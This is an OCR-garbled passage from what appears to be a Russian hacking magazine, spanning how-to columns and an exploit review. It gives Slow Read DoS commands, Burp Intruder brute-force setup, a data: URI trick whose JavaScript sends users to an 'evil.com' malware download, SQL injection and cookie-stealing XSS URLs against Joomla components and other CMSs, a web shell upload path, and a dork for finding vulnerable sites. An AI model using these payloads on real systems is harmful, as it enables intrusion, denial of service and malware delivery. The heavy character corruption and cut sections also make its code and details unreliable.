тому есть тулзенка на РегГе от репіезітопкеу — доо.дІ/ЬВЫоУ 



(см. скриншот 2). Кстати, в М5Р есть аналогичный модуль, 
но не умеющий работать с «РСРТ ТО» (очень жаль). 

Кроме того, хотелось бы отметить, что, подключившись 
к 5МТР-серверу, мы можем иногда выведать информацию 
и общего плана. Например, версию ОС сервера или имя до- 
мена. 




Зтір-изег-епит от репіезітопкеу в действии 



ПРОВЕРИТЬ СТОЙКОСТЬ 
ВЕБ-СЕРВЕРА ЧЕРЕЗ 5І.0ѴѴ КЕАБ 005 



ЗАДАЧА 



РЕШЕНИЕ 

Продолжаем тему стресс-тестов веб-сервера. На сегодня у нас 
еще один меееееедленныыыый мееетооод — 5Іоѵѵ Реасі йо5. Но, 
несмотря на свою «медлительность», он достаточно эффективный, 
да и защититься от него не так просто, поскольку он располагается 
где-то между транспортным уровнем (ТСР) и уровнем приложения 
(НТТР) модели 051. 

Но давай по порядку. Итак, 5Іоѵѵ Реасі НТТР йо5 — это атака, 
суть которой в том, что мы эмулируем множество медленных под- 
ключений. Но, в отличие от ЗІоѵѵІогіз'а или 5Іоѵѵ РозСа, в которых мы 
медленно отправляли запросы на сервер и тем самым расходовали 
его ресурсы, здесь мы нормально отправляем запрос, но очень мед- 
ленно его получаем — что, я думаю, и так понятно из названия :). 

То есть во время атаки мы запрашиваем какой-то большой 
файл, скачиваем часть его, а потом устанавливаем размер для 
ТСР-пакета (ѴѴіпбоѵѵ зі т.е) очень маленьким и будем только изобра- 
жать, будто что-то качаем. Таким образом, атака происходит не на 
уровне НТТР-протокола, а на уровне ТСР. 

Аналогичный йо5 можно вызвать и у серверов большинства дру- 
гих протоколов. Так, в 2008 году Джек Луис Раск 1_ошз) из 0иІро5І24 
разработал тулзу зоскзіезз, которая позволяет проводить аналогич- 
ные атаки и на другие протоколы. Кроме этого, она много всего уме- 
ет и заслуживает отдельной статьи, так как до сих пор актуальна... 

Но, как верно подметил автор данной атаки Сергей Шекян 
(5егдеу ЗЬекуап), отключение медленных пользователей — дело 
все-таки приложения, а не ядра. Так что косяк у веб-серверов и их 
конфигурации есть или может быть. 

Подробнее о самом методе можно прочесть здесь: доо.д1/5х0І_0 . 

Теперь перейдем к практике. Для реализации этой атаки нам по- 
требуется тулза зіоѵѵбиріезі ( доо.дІ/зиРхЯ . Итак, качаем и ставим: 

$ іаг -Х 2 Ѵ-Р 5Іоіл/Іі1:1:р1:е5І:-х.х.1:аг . %2 
$ ссі 5ІомІтІ:1:р1:е5І:-х.х 
$ ./сопб§иге - -ргебх=РКЕРІХ 
$ таке 

$ зисіо таке іпзііаіі 

где РРЕРІХ — абсолютный путь, куда ставить тулзу. 



На практике для реализации атаки требуется немного поиграть 
с настройками для выбора оптимальной конфигурации, но стан- 
дартный пример выглядит следующим образом: 

$ 5ІоыІі1=1=р1=е5І= -с 1000 -X -о зіоы геасі зііаііз \ 

-г 200 -м 512 -у 1024 -п 5 -2 32 -к 3 
-и ІтЕір: //ехатрІе.оп^/іпсІех.ЫітІ -р 3 

-сЮОО — количество создаваемых подключений, 

-X — использоватьатаку5Іоѵѵ Реасі, 

-д — генерировать статистику с именем, указанным в '-о', 

-г 200 — создавать по 200 соединений каждую секунду, 

-ѵѵ, -у — примерные границы размера ТСР ѵѵіпсіоѵѵзіге при инициали- 
зации соединения, 

-п5 — интервал между получением данных, 

- 2 32 — количество байт, читаемых после каждого интервала, 

-кЗ — использовать НТТР ріреііпіпд (три запроса водном подключении), 
-и ЬНр://ехатрІе.огд/іпсІех.ІіІплІ — запрашиваемая страница, 

-РЗ — тайм -аут в секундах, после которого сервер будет считаться 
упавшим. 

Я думаю, что с использованием расшифровки все становится ясно. 
Единственный момент: НТТР ріреііпіпд — это технология, позволяю- 
щая в одном ТСР-подключении сделать сразу несколько НТТР- 
запросов. Используется, как понятно, для ускорения общения сервера 
и клиента. Она поддерживается многими веб-серверами по умол- 
чанию, хотя из браузеров ее поддерживает только Орега и СЬготе. 

В 5Іоѵѵ геасі НТТР ріреііпіпд используется для того, чтобы объединить 
несколько запросов в один, когда на атакуемом веб-сервере нет 
ресурсов, размеры которых были бы больше размера буфера. 

Хотелось бы отметить, что и против НТТР5 можно применять 
аналогичную атаку. В данном случае сначала будет устанавливать- 
ся нормальное 551-подключение, а уже потом проводиться атака 
на НТТР по приведенному выше алгоритму. 

Кроме указанной атаки, зІоѵѵЬирІезІ умеет проводить 
и 5ІОѴѴІОГІ5, и 5Іоѵѵ Розі, и даже АрасЬе Рапде йо5, и с хорошим 
уровнем конфигурации, потому считаю ее во многом незаменимой 
штуковиной :). 
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ВЫБРАТЬ СВОБОДНЫЙ ІР-АДРЕС 



ЗАДАЧА 



РЕШЕНИЕ 

Возможно, что такая задача шокирует тебя своей простотой 
и возникает мысль пропустить этот вопрос. Но прошу не судить 
так быстро и разобраться в деле. 

Данная задачка может быть совсем не тривиальна при 
следующих условиях. Во-первых, мы физически подключаемся 
к неизвестной нам сети. Во-вторых, в ней нет ОНСР-сервера. 
В-третьих, мы хотим совсем «тихо» подключиться, то есть ничего 
не «повредить» и выбрать точно незанятый ІР. 

Решений на самом деле есть несколько, но мне понравилось 
от реп1:е5І:ппопкеу, так как оно дает достаточно большую уверенность 
в истинности результатов и достаточно просто автоматизируется 
(под *піх'ами]. 

Итак, первым делом, подключившись к сети, мы должны 
хотя бы приблизительно понять, в какой подсети мы находимся. 

И конечно, здесь самым простым вариантом будет сниффер. 
Запустив ѴѴігезЬагк, мы можем увидеть, какие пакеты есть в сети. 
Например, увидели широковещательный запрос от 192.168.79.1. 

Мы предполагаем, что это подсетка класса С. 

Что дальше? Дальше нам потребуется тулза агр-зсап [ доо.ді/ 
ІБпііЕ) или аналогичная, чтобы посканить подсеть с помощью АРР, 
но с возможностью подмены исходящего ІР-адреса в теле АРР- 
запроса. 

И затем — самое интересное. У нас в запасе имеется ряд 
диапазонов ІР-адресов, которые мы можем использовать, не боясь 
при этом как-то навредить. 

127.0. 0.1/8 

0 . 0 . 0.0 

255.255.255.255 

1 . 0 . 0 . 1/8 

Все они фактически не могут быть задействованы в сети, так как 
относятся к зарезервированным. Кроме того, мы можем временно 
взять один из последнего диапазона и для себя. 

Несмотря на то что диапазоны эти «технические», мы можем 
использовать их при сканировании сети с помощью АРР. 

$ агр-зсап --агрзра=127. 0.0.1 192.168.79.1/24 
$ агр-зсап --агрзра=0. 0.0.0 192.168.79.1/24 



$ агр-зсап --агрзра=255.255.255.255 192.168.79.1/24 
$ агр-зсап --агрзра=1. 0.0.1 192.168.79.1/24 

Важно отметить, что разные ОС и сетевое оборудование по- 
разному отвечают/ не отвечают на эти запросы (см. скриншот], 
но именно применение их вместе дает почти полное покрытие. 

В итоге мы получаем список занятых ІР-адресов. Из оставшихся 
свободных ІР'шников мы можем выбрать себе. Отмечу, что автор 
техники предлагает для пущей уверенности проверить и выбранный, 
послав кросс АРР-запрос из двух свободных ІР-адресов. 

$ агр-зсап --агрзра=192. 168. 79.3 192.168.79.250 
$ агр-зсап -~агр5ра=192. 168. 79.250 192.168.79.3 

Еще хотелось бы отметить, что агр-зсап — очень дельная вещь 
и к ней стоит присмотреться. Например, один из модулей данной 
тулзы позволяет определять ОС по ответам на различные АРР- 
запросы (АРР ОБ йпдегргіпйпд]. 




Из сниффера — диапазон ІР. Далее, используя агр-5сап, получим списокзанятыхІР 



СДЕЛАТЬ СКРИНШОТЫ ВЕБ-СЕРВЕРОВ 



ЗАДАЧА 



РЕШЕНИЕ 

Еще одна чисто пентестерская проблемка. А если точнее, то ее 
решение. Когда ломаешь группу хостов — корпоративку или пучок 
серверов в интернете, одним из главных дел является «поползать 
и посмотреть» (то есть определить, какие сервисы доступны). 
Конечно, здесь очень помогает один из главных инструментов — 
ІЧтар: находим открытые порты, определяем сервисы на них 
и так далее. Но очень часто находится множество всяких доступ- 
ных НТТР-серверов. Да, ІЧтар нам показывает, что это НТТР- 
сервер, возможно, даже скажет его название и версию, а с по- 
мощью ЫБЕ-скрипта можно получить заголовок (<Ш1е>) первой 
странички и еще кое-какие общие характеристики. Но он нам не 
даст нормального понимания, что находится на начальной страни- 
це. И приходится ходить по каждому из портов своим браузером. 

А это, согласись, нельзя назвать «автоматизированным подходом». 




Вывод результатов ѴѴеЬзсоиг 
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Вывод результатов М5Е-скрипта 



СУТЬ В ТОМ, ЧТОБЫ СКРИПТ 
«ЗАХОДИЛ» НА КАЖДЫЙ 
НТТР-СЕРВЕР И СОЗДАВАЛ 
СКРИНШОТ ВЕБ-СТРАНИЦЫ 



Но, как ясно, решение для данной проблемки имеется, и очень 
«показательное» (как-никак общепентестерская проблема). Суть 
его в том, чтобы привинтить к ІМтар'у (или аналогичной тулзе) 
скрипт, который «заходил» бы на каждый НТТР-сервер и созда- 
вал бы скриншоттакой страницы, как если бы мы сами зашли на 
веб-сервер браузером. Есть несколько реализаций, так что можно 
выбрать ту, которая более по вкусу. 

1. От ТгизІѴѴаѵе. Здесь нам потребуется программка 
ѵѵШтІІоітаде для создания скриншотов из набора ѵѵШтІІорсК 
( собе.доодІе.сот/р/ѵѵШтІІорсіЛ и М5Е-скрипт( доо.дІ/І5пЬЕ ). 

который для всех открытых портов делает скриншоты. Для того 
чтобы собратьскриншоты в одну НТМІ_'ку, можно взятьспеци- 
альный зЬеІІ-скриптик ( доо.дІ/]Т21Ь ). Пример вывода смотри на 
скриншоте. 

2. ОтСуЬегіз. Все, что нам потребуется, — скриптна РегГе — 
ѵѵеЬзсоиг.рІ ( доо.д І/50Ас8 ) и РегІ-модульдпоте-ѵѵеЬ-рЬоІо. 

В качестве плюса этойтулзы можно выделитьто, чтоу нее более 
крутой вывод итогов. Минус — необходимость заранее формиро- 
вать список ІР и портов. 

3. 0т5есиге51аІе.5есиге5іаІе разработали модульдля М5Р 
( доо.дІ/аОЕЗМ ). Его фишка в том, что он не создает скриншоты 
сайтов, а создает НТМІ_-странич кус фрейма ми, указывающими 
на просканированные НТТР-серверы. Интересное решение, 
жаль, «без напильника» в М5Р не работает:). 



ОРГАНИЗОВАТЬ «УМНЫЙ» 

ПЕРЕБОР, ИСПОЛЬЗУЯ вітр ШТВІШЕК 



ЗАДАЧА 



РЕШЕНИЕ 

РІаверное, один из самых главных методов пентестера — перебор 
(ЬгиЫогсе). Оно и понятно, работаем мы часто «вслепую», методом 
научного тыка. А потому без хорошего инструмента не обойтись. 

Вот классический пример: есть веб-приложение, при входе 
в систему пользователь вводит логин и пароль, но ответ от сервера 
различный при вводе некорректного логина и при вводе неверного 
пароля. Мы можем таким образом перебрать и на основе анализа 
ответов получить список всех пользователей. Конечно, можно на- 
писать простенький скриптик... но зачем, когда у нас в руках есть 
такое прекрасное средство, как Вигр 5иіІе. А если точнее, то его 
модуль Вигр Іпігибег, который умеет очень многое и, что важно, 
присутствует в бесплатной версии. 

Учитывая, что не очень многие в курсе возможностей этого мо- 
дуля, я позволю себе привести здесь некий показательный хелп. 
Итак, если все сильно упростить, то Вигр Іпігибег — это модуль, 
с помощью которого мы можем менять типовой запрос к серверу, 
по определенным правилам в различных местах, а после этого 
анализировать, опять-таки по определенным правилам, ответы 
от сервера. 

Во вкладке «Іпігисіег» есть четыре основные вкладки, с помо- 
щью которых можно настроить модуль под свою цель: 



ТАК6ЕТ. Здесь все понятно. Сервер, порт, использование 551. 
РОБІТІОМБ.Здес ьмы определяем, в какихчастях нашегозапроса мы 
хотим менять да иные и каким образом это должно происходить. 

Например, мы имеем подозрение на сіігесіогу ІгаѵегзаІ в одном 
из полей СЕТ-запроса. И для того, чтобы протестировать различ- 
ные варианты траверсала (слеш, бэк-слеш, вариации энкодинга 
и количества вложений), нам требуется указать именно это поле 
СЕТ-за проса в данном окне. Выделить для Вигр'а это поле мы 
можем, используя символ §. 

СЕТ /ехатр1е.рІір?1:паѵег5а1_Ііепе=§р1ѵа1§&р2=ЫаІі-ЫаІі \ 
НТТР/1.0 

Причем количество позиций можно задать почти любое (в за- 
висимости от типа атаки). РауІоасІ — это список данных, которые 
мы собираемся подставлять в запрос. Взгляни на скриншот, и все 
станет ясно. В данной вкладке больше вопросов и возможностей 
заложено в списке «аМаск Іуре»: 

• Зпірег — для каждой позиции происходит поочередный полный 
перебор пэйлоада. При этом незадействованные позиции будут 
отправлять без изменений. То есть это поочередный перебор 
каждой позиции. Пэйлоад может быть только один. 
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Список стандартных ІгаѵегзаГов с подменой данных по регэкспу на необходимое 
имя файла 




Выдираем из ответа сервера необходимые для нас данные 




• Ваііегіпд гат — во все позиции происходит поочередная под- 
становка строк из пэйлоада. Пэйлоад может быть только один. 

• РіІсМогк — здесь пэйлоадов может быть до восьми. Для каж- 
дой позиции будет применен свой пэйлоад. Алгоритм перебора 
следующий: поочередно берутся строки из пэйлоадов и выстав- 
ляются на места позиций. Первый шаг — первая строка первого 
пэйлоада в первую позицию, первая строка второго пэйлоада 
во вторую позицию; второй шаг — вторая строка первого 
пэйлоада в первую позицию, вторая строка второго пэйлоада 
во вторую позицию и так далее до конца самого короткого из 
пэйлоадов. 

• Сіизіег ЬотЬ — аналогично, пэйлоадов до восьми и к каждой 
позиции свой. Здесь все просто — каждая строка одного пэй- 
лоада с каждой строкой другого пэйлоада. То есть перебор всех 
вариаций сопоставления строк пэйлоадов. 

Если что-то не очень понятно, посмотри скриншот, и все должно 
определиться. На нем указано две позиции и пэйлоад, первый — 
перебор от 1 до 10, а второй — перебор одной буквы А до десяти 
букв А. 

Я думаю, ощущение мощности и потенциала модуля должно 
тебя тоже посетить :).Но постой, мы не посмотрели на еще две 
вкладки. 

РАУЮАйБ. Определяет™, какбудутгенерироваться строки или 
откуда они будут браться. Список генераторов немалый, я его не буду 
здесь приводить, просто отмечу, что его хватит для большинства 
возможных потребностей. Но если чего-то не будет хватать, то можно 
будетнагенеритьнеобходимое вфайл и подгрузитьего. 



Что больше хотелось отметить, так это возможности автомати- 
ческой обработки пэйлоадов перед отправкой. Можно добавить 
в начало и конец пэйлоада строку, удалить какие-то части строки 
из пэйлоада, пропустить строку пэйлоада при определенных 
условиях, захешировать, декодировать или изменить часть строки 
пэйлоада. То есть совмещение генератора и процессора еще 
больше расширяет возможности Іпігисіег'а. Простейший пример 
смотри на скриншоте. Там мы берем список возможных вариантов 
сііг ІгаѵегзаГа и подменяем {РНЕ} на имя интересующего нас файла. 
ОРТІОМБ.Здес ь хранятся основные настройки для проведения ата- 
ки, типа, скорости отправки запросов, хранения запросов/ответов, 
автоперехода по редиректам. 

Я бы пропустил данный пункт, если бы не одна прикольная 
штука, хранящаяся здесь. А именно — возможность дгер'ать ответ. 
То есть здесь в разделе «дгер» мы можем указать правила для об- 
работки ответов от сервера. Варианта три: 

• таісіі — ищет в ответе от сервера определенные нами строки. 
Например, «еггог», «асітіпізігаіог» и так далее. Если находит, 
то об этом будет стоять соответствующая галочка; 

• ехігасі — выдирает и сохраняет из ответов определенные стро- 
ки (включая многострочные) по регэкспу; 

• рауіоасіз — будет искать в ответе от сервера отправленный 
нами ранее пэйлоад. Это может пригодиться для поиска ХЗЗ'ок. 
Пример опятьже смотри на скриншоте. 

Да, и общий совет: если не юзал Вигр Іпігисіег, то обязательно 
попробуй :). Более полное описание ты можешь прочитать в офици- 
альной документации: о.аІ/ѵ2ЕВ2 . 
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Хакерские секреты простых вещей 



ОБМАНУТЬ ЮЗЕРА, ИСПОЛЬЗУЯ ОАТА: 



ЗАДАЧА 



РЕШЕНИЕ 

В прошлых номерах мы уже обсуждали несколько III гебгеззіпд 
атак (типа сіісіфскіпд'а). Суть этих атак в том, чтобы юзер думал 
и, главное, видел, будто делает что-то хорошее, например играет 
в онлайн-игрушку, а фактически своими действиями совершал 
что-то плохое — точнее, хорошее для атакующего, — например 
отправлял свои куки на сервер хакера. На самом деле, кроме клик- 
джекинга, существует множество и других атак. Есть такой хакер — 
Михал Залевский (МісЬаІ 2аІеѵѵзкі). Кто-то сказал, что он маг и вол- 
шебник веба. И я с этим согласен :). Так вот, он предложил в своем 
блоге несколько вариантов атак на юзеров с применением схемы 
баіа:. И честно скажу, что большинство ІТ-шников при правильном 
подходе «попадутся на удочку» и не заметят III гесігеззіпд атаки :). 

Но давай уж к делу. Для тех, кто не в курсе: баіа: — это 
специальная схема, которую поддерживает сейчас большинство 
браузеров и которая «позволяет включать небольшие элементы 
данных в строку ІІРІ_, как если бы они были ссылкой на внешний 
ресурс» (по мнению вики]. Поясню на пальцах. Мы можем разме- 
стить в ІІРІ_ некий НТМІ_-код, который будет исполнен браузером, 
как если бы он был получен от сервера. Все равно как-то непо- 
нятно звучит... Посмотрим примеры, которые все расставят на 
места. Если напишем в адресной строке следующее, то увидим 
толстое слово ЬоІсІ (см. скриншот): 

сіаііа : 1:ех1:/М1:т1 . <Ь>Ьо1сІ</Ь> 

А это — другой пример из вики. В нем мы в теге ітд указы- 
ваем схему сіаіа, а далее код гиф-картинки в закодированную 
Вазе64. То есть, открыв страничку, где будет такой код, браузер 
отобразит нам рисунок, но при этом не будет произведен запрос 
к веб-серверу для получения рисунка. 

<іт§згс="сІа1:а : іта§е/§іТ; Ьазеб4 л КѲІСООбЬМААмАРАААААААР \ 
///уи/АААААМААмАААС8ІуРдсѵ1:ЗмСсОкіІс7С0дыуеНЬ5Ырд(2и5уд 
тСѴзаруиѵШ1ѵОМтО21:-р2§Р2ВуТВ10(2§хОК0ТдВ(2едЬКІ\І2О-І : кѴІ)+5 

Е81М10ІсК7ІЕешсІ Р 71:иММкМЗиМпаЗР230Ро97Ѵгіу/ХІ4/-РісТ5 
Ѵ1лІ2Хуут7РНІіІіх4сІЬ§УКААА7"а11=="Іагпу" /> 

Другие примеры также можно найти на той же вики, но надеюсь, 
идея ясна. Фактически формат использования баіа следующий: 

баііа: [<МІМЕ-1=ѵре>] [ ; сЬагзеІхепсобіп^] [ ;Ьазе64] . <ба1=а> 

• МІМЕ-Іуре — это МІМЕ-тип контента. Например, Іехі/Ыті. 

По умолчанию Іехі/ріаіп. 

• СЬагзеІ — кодировка. 

• Ьазе64 — указание, что данные закодированы Вазе64. 

Далее же идут сами данные. 

Ну, с теорией разобрались, теперь — практика. Михал Зелев- 
ский привел несколько примеров, как можно обмануть юзера, 
используя сіаііа. Суть примеров в том, что, используя сіаііа, мы мо- 
жем в каком-то смысле обойти кроссдоменные политики (50Р). 
Точнее, наверное, так — мы можем открыть окно с одним до- 
меном, но при этом иметь возможность частично контролировать 
то, что в нем происходит. Для понимания сути атак их, конечно, 
желательно сначала увидеть и попробовать ( доо.д І/5Е8АА, 
доо.д І/ІоЗдсІ ). Но с учетом бумажного формата я опишу одну из 
атак словами. Мы заходим на сайт. Кликаем на кнопочку и пере- 
ходим на сайт АбоЬе. И перед нами появляется предложение ска- 
чать АсгоЬаІ Реабег. Мы скачиваем его и запускаем. А на самом 
деле мы скачали что-то злое от хакера. 




ААА! АсІоЬе распространяет малварь! 

Мне кажется, что данная схема достаточно работоспособна. 
Во-первых, у нас много всяких сайтов, где кучкуются списки 
разного ПО (зой-порталы). Во-вторых, когда мы видим, что на- 
ходимся на сайте АбоЬе, то мы доверяем тому, что нам предлага- 
ют скачать. Имхо, хороший способ доставки мал вар и. Как же это 
происходит? Для этого на начальной странице, контролируемой 
хакером, используется следующий код: 

< іприі: 1:ѵре="зиЬті1:" опс1іск="боі1іО " ѵа1ие="С1іск те."> 
<5СГІр1і> 

ѵаг ѵі; 

ѵаг опсе; 



■РипсЕіоп богЬ() { 

ѵі = ыіпбоы.ореп( ’баііаіііехіі/ыітіхтеііа Ы:1ір-едиіѵ= \ 
" ге-РгезЬ" соп1:еп1:= ,, 0; ІЖІ_=Ы:1:р ://§е 1: . абоЬе . сот/ 
ЛазЬр1ауег/бомп1оаб/?іп5І:а11ег=Р1а5Ь_Р1ауег_11 

іог_Іп1:егпе1:_Ехр1огег_(64_Ы-Ь)&о5=ІлІіпбоы5%20 

7&Ьгоы5ег_1іѵре=М$ІЕ&Ьгоы5еп_бІ5І:=0ЕМ&б=6оо^1е_ 
Тоо1Ьаг_7 . 0&РЮ=4166869" 1 -Роо 1 ) ; 

зеіітітеоиі: (бопехі:. 45ѲѲУ. 

} 



-РипсЕіоп бопехі: ( ) { 

ыіпбоы.орепС , Ь^Е^Ьр://еѵі1.сот/та1ѵ^/а^е.с^2І , . '-Роо' ) ; 
і-р (опсе != Іігие) зеІіТітеоиІ: ( бопехі: . 5000 V. 
опсе = Ііпие: 

ь_ 

</зсгір1:> 

Если говорить упрощенно, то здесь мы видим следующее: 
когда юзер кликает, срабатывает 65-код, который создает 
окошко с использованием баіа. В баіа он указывает, что нужно 
подгрузить другую страницу, а именно страничку с абоЬе.сот. 
После тайм-аута выполняется другая функция, суть которой 
в том, чтобы открыть ІІРІ_ хакера, возвращающий предложение 
скачать ПО, и все происходит в том же окне. 

Что еще устрашняет дело — этому подвержены все современ- 
ные браузеры, и исправлять такое поведение их производители 
не торопятся, т 
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ВЗЛОМ/ОБЗОР ЭКСПЛОЙТОВ 



Павел Александрович (іѵіпзісІе.ЫодзроСсот) 
Дмитрий Михайлович (115612, дер. Красная звездочка, д. 1] 



Чем выше звуки, тем труднее ихуслышать. 

Путь вперед есть путь к отступлению. 

Великийталантпроявляется в концежизни. 

Даже совершенная программа по-прежнему 
содержитошибки. 

Джеймс Джеффри. Дао программирования 

Обзор 

эксплоитов 




АНАЛИЗ СВЕЖЕНЬКИХ УЯЗВИМОСТЕЙ 



1 501,-инъекцияв.ІоотІаРігеВоагсі 



СѴ55Ѵ2 7.5 



( АѴ: Ы/АС : І_/АІЭ : ІМ/С: Р/І : Р/А: Р) 

шш 

Эоотіа — известная система управления контентом, написанная на 
РНР. К настоящему моменту она была скачана более 23 миллионов 
раз. В июле исследователь под именем Эрам Шамохамади (ЕЬгат 
ВЬаЬтоЬатасІі] обнаружил уязвимость в модуле сот_ЯгеЬоагсІ 
этой СМ5, позволяющуюудаленно выполнятьпроизвольныеБОБ- 
команды на целевом сервере. 



ЕХРЮІТ 



Уязвимости подвержен параметр іипс. Из-за недостаточной 
фильтрации пользовательских да иных можно воспользоваться 
любыми классическими методами эксплуатации 5СИ_- инъекций, 
если таковые не будут пресечены средствами безопасности на 
сервере. Возможные примеры реализации представлены ниже: 

1 . [5ІТЕ]/іпсІех. рІір?ор1:іоп=сот_1іпеЬоагсІ& Л 

І1:етісІ=Ѳ&ісІ=1&са1=ісІ=Ѳ&-Рипс=-РЬ рсІ-Р' [50І.-ІМЗЕСТІ0ІМ] 

2. [5ІТЕ] /іпсіех. р!ір?ор1:іоп=сот_бгеЬоапсІ& \ 

I1:етісI = 0&іс I =1& с а1:ісI =5 &-Рипс=-Р Ь _рсI-р , [ 5 0І_-І№ЕСТІ0І М] 

3 . __[5ІТЕ]/2012/іпсІех. рбр?ор1:іоп=сот_бгеЬоагсІ& \ 

Іі:етісІ=79&ісІ=1&са1=ісІ=2&Ч=ипс=-РЬ_рсІ-Р ' [ - ІМЗ ЕСТІОМ ] 

4. [5ІТЕ]/бгеЬоагсІ/іпсІех. рбр?ор1:іоп=сот_бгеЬоагсІ&І1:етісІ= \ 

38&ісІ=22111&са^ісІ=16&-Рипс=-РЬ рсІ-Р' [БОБ-ТЫРЕСТЮМ] 

5. [$ІТЕ]/ЬоапсІ/іпсІех. р!ір?ор1:іоп=сот_бгеЬоагсІ&І1:етісІ=54& \ 

ісІ=7Ѳ122&са1:ісІ=12&-Рипс=-РЬ_рсІ-р 1 [50Б-ІЮЕСТІ0ІМ] 



6. [5ІТЕ]/]тбпеЬоапсІ/іпсІех. рІір?ор1:іоп=сот_бгеЬоагсІ& \ 
І1:етісІ=54&ісІ=70122&са1:ісІ=12&-Рипс=-РЬ_рсН : ' 
[50Б-ІМЗЕСТІ0М] 

Доркдля боодіе выглядитследующим образом и выдаетвесь- 
ма много результатов: 

іпигі: "сот_бгеЬоагсГ іпигі: ,, -Рипс=■РЬ_рсН :,, 



ТАР6ЕТ5 



РігеВоагс1 1.0.5 и, возможно, более ранние. 



50ШТІСМ 



На сегодняшний день патча для закрытия да иной уязвимости не 
существует. 




Успешно находим несколько миля ионов страницсЭоотІаРігеВоагсІ 
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Обзор эксплойтов 



~ Множественные уязвимости в.ІоотІа 
^ Іоотдаіаху 



СѴ55Ѵ2 7.5 






( АѴ: Ы/АС: Ь/АУ : N/0: Р/І : Р/А: Р) 



В первый день августа был и опубликованы детали уязвимостей в оче- 
редном компоненте Іоотіа — щотдаіаху. Ответственностьза наход- 
ки — 5С11_-инъекцию и загрузку произвольного файла — взял на себя 
исследовательДаниэльБарраган (0апіеІ«04І\ІВ4П»Ваггадап). 



\шь\и 

1. Загрузка п роизвольного файл а. Для успешной эксплуатации не- 
обходимо выполнить следующие незатейливые действия: 

• проследовать по ссылке, за регистрироваться 
изалогиниться: 

ІтЕ'Ер : //зііе/іпсіех . рбр?ор1:іоп=сот__иБег5& \ 
ѵіеы=ге§ізіга1:іоп 

• пройти поссылкеидобавитьновуюзапись: 

ІтЕ'Ер ://зі1:е/іпсІех. рбр?ор1:іоп=сот_доот§а1аху& \ 
ѵіеы=асІсІеп1:гу 

В некоторыхслучаяхдля добавления поста нужно одобрение 
администратора, поэтому, чтобыуспешно пройти этотэтап, 
потребуется проявить навыки социальной инженерии. 

• после публикации поста необходимо пройти назакладку 
«Ітадез» и загрузить шелл под именем зЬеІІ.рЬрдрд. 

Шелл будет доступен поадресу: 

Іт1=1=р://5І1=е/асІтіпІ5І=га1=ог/сотропеп1=5/сот_іоот^а1ахѵ \ 
/а 55е1:5/іт а §е5/Іт а § е _§а11егу/гап сІот іс І _5Ііе 11 . рбр . др§ 

2. 5С|1_-инъекция. Из-за недостаточной фильтрации входныхданных 
в параметре саііб атакующий имеет возможность выполнять 
произвольные 5 СП-команды. Доказательство аккуратнейшим 
образом прилагается: 

ІтЕ'Ер: //зі'Ее/іпсІех.рІір?ор'Еіоп=сот_доот§а1аху& \ 
ѵіеы=са1:е§огу1І5І:&1:уре=1:ІіитЬпаі1&1ап§=еп& 
са1:ісІ=1=1 ипіоп (зеІесЕ І^аіаЬазеО , 
3,4,5,6,7,8,9,10,11,12,13) 



атакующему провести 5СП_-инъекцию путем записи в соответ- 
ствующие поля значения огТ='Г, что приведет к успешной 
аутентификации в роли администратора. 

2. Недостаточная фильтрация значения параметра соипігу присут- 
ствует в скрипте зеагсЬгезиІІз.рЬр, вновь вынуждая атакующего 
пуститься во всетяжкие и реализоватьБСЛ-инъекцию. 

3. Межсайтовый скриптинг возможен в скриптах іпсЫез/ 
ІапдиадеЬаг.рЕір, асІтіпізЕгаЕог/Іодіп.рЬр и іпбех.рЕір, примеры экс- 
плуатации следуютниже: 

• ІтЕ1:р://127.0.0.1/І'іЬрогі:а1/іпс1исІе5/1ап§иа§еЬаг.рІір? \ 

Х55 = " : </ 5сгір~Е><зсгір'Е>а1ег'Е ( 1) ; </5сгір1:><5Сгір1:> 

• ІтЕ'Ер: //127. 0.0.1/ІіЬрог1:а1/асІтіпІ5іга'Еог/1о§іп.рІір? \ 

Х55=" : </ 5сгір~Е><5сгір'Е>а1ег'Е (1) ;</зсгір'Е><5сгір'Е> 

• ІтЕ'Ер: //127. 0.0 .1/ІіЬроп1:а1/іпсІех.рІір?1ап^=" ;</зсгір1=> \ 

<зсгір'Е>а1егЕ(сІоситеп'Е.соокіе) ;</зсгір'Е><5сгір'Е> 



ТАР6ЕТ5 



НоЕеІ Воокіпд РогЕаІ ѵО.1 . 



50ШТІ0Ы 



На сегодняшний день патча для закрытия этойуязви мости не суще- 
ствует. 
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Множественные уязвимости 
в Пупах СепегаІ СІаззігіесІз СМ5 



СѴ55Ѵ2 



7.5 



(АѴ:М/АС:І_/Аи:І\І/С:Р/І:Р/А:Р) 

ЩЩ 

В середине лета бравая команда черно шляпников и войтохе- 
дов под названием «Ѵи I п е га Ьі I іЕу І_аЬогаЕогу ПезеагсЬ Теат» 
обнаружила ряд уязвимостей в системе управления контентом 
РІупах бепегаі Сіаззіііесіз, чем и поспешил а поделиться с обще- 
ственностью. 



ЕХРЮІТ 



1. 5С|1_-инъекция присутствуете модуле бепегаі, параметрезогІ_Ьу. 
Успешная эксплуатация да иной уязви мости приведет к ком- 
прометации базы данных приложения. Для этого не требуется 
владетьаккаунтом какого-либо пользователя. Пример: 

ІтЕ'Ер ѴУ§епега1. [5ЕКѴЕК] : 1339/§епега1?зог1:_Ьу=-1 \ 

ипіоп аіі зеІесЕ 1,2,3,4,5,6,7,8,9,@@ѵег5Іоп,11-- 



ТАР6ЕТ5 



Іоотіаротдаіаху 1. 2.0.4 и, возможно, более ранние. 



50ЮТІ0Ы 



Обновиться до версии 1.2. 0.5 или более поздней. 

3 Множественные уязвимости в Ноіеі Воокіпд 
Рогіаі 



СѴ55Ѵ2 7.5 



( АѴ: Ы/АС : Б/АШ : N/0 : Р/І : Р/А: Р) 

НоЕеІ Воокіпд Рогіаі написан на РНР, ІаѵаБсгірЕ и Му50І_. Граждани- 
ном по имени Яки р В изман (УакігѴѴігтап) в этом приложении был 
обнаружен рядуязвимостей, среди которыхБСЛ-инъекции и раз- 
нообразныеХББ. 



ЕХРЮІТ 



1. Недостаточная фильтрация значений параметров етаіі 

и раззѵѵогсі присутствует в скрипте Іодіп.рГір, позволяя тем самым 



2. Активные Х55 были обнаружены в следующих модулях: 

• Соттоп > Асітіпізігаіогз > АсІсІ ап Асітіпізігаіог & Ызііпд 

• СІзег Ассоипіз > АсІсІ ап ІІзег Ассоипі & Ызііпд 

• Саіедогіез > АсІсІ а Саіедогу & Ызііпд 

Уязвимыми являются параметры ІІзегпате иТШе. После вне- 
дрения в эти поля произвольного кода его можно будет наблюдать 
на соответствующей странице пользователя/категории. 

